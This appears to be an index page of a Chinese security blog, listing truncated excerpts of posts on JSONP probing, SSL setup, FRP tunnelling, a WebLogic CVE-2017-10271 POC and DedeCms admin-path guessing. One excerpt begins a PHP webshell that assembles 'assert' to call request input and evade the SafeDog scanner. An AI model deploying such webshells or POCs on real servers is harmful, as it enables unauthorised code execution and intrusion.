JSONP接口探测插件编写思路

最近有机油有挖掘jsonp接口的需求,最原始的办法就是对每一个页面进行XHR的请求查看,并观察接口是否为jsonp 根据已知经验,我们可以得出: 1.JSONP接口为XHR请求 2.通常URI中有callback参数或者其他可控参数 3.响...

阅读全文>>

Web安全研究人员是如何炼成的

原文:https://portswigger.net/blog/so-you-want-to-be-a-web-security-researcher 序 您是否有志于推动Web安全技术的发展,并与信息安全社区分享相关知识呢?在这篇文章中,我将为读者分享与Web安全研究有关的各种建议,当然,这些建议...

阅读全文>>

使用Let's Encrypt 证书进行SSL加密

最近Google Chrome浏览器有大动作,所有没有https的都标识为不安全,作为有轻微心理洁癖的人,这个不能忍,遂,折腾之! 要为网站部署SSL首先需要证书,而证书由CA机构签发,而基本所有的CA机构签发证书是需要收费的...

阅读全文>>

ClassUtils调用引发的几处Bug解决过程记录

前言: 由于Java不像其他语言具有天生的自带的动态特性,为了满足AOP开发模式,我们需要大量用到反射技术,而反射则先需要找到对应的类,这里记录一下在使用ClassUtils进行扫包的时候遇到的问题 最近因为工作需要,需要...

阅读全文>>

Php Webshell ByPass SafeDog

记录一些php webshell代码 最新版安全狗扫描结果: 下面是代码,代码顺序为图中顺序: <?php $arr = array('a','s','s','e','r','t'); $func = ''; for($i=0;$i<count($arr);$i++) { $func .= $func . $arr[$i]; } $func($_REQU...

阅读全文>>

Github下载单个文件或文件夹Tips

最近学习Storm,于是从Github下载https://github.com/alibaba/jstorm 由于环境已经通过其他方式部署完成,所以并不需要完整的项目,只需要下载单个文件或者文件夹,这个时候使用git就比较麻烦了。 另外github听说不支持git clone某个文...

阅读全文>>

FRP内网穿透笔记

有时需要临时将本地的服务提供到外部进行访问,一般情况下我们的做法有两种 1.路由器设置端口映射将本地服务映射到公网某个端口 2.在公网服务器上搭建相关服务 前者需要路由权限,且路由映射的的数量有...

阅读全文>>

大数据技能点

                路漫漫其修远兮,吾将上下而求索             一、大数据通用处理平台       &nb...

阅读全文>>

Weblogic WLS组件漏洞POC

漏洞编号:CVE-2017-10271 漏洞描述:WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击 受影响WebLogic版本:10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0。 http://0.0.0.0...

阅读全文>>

DedeCms后台猜解

网上流传的一个找后台的姿势,记录一下: <?php $domain='http://localhost/dedecms/'; $url=$domain.'/index.php'; function post($url, $data, $cookie = '') { $options = array( CURLOPT_RETURNTRANSFER => true, CURLOPT_HEADER => true, CURLOPT_P...

阅读全文>>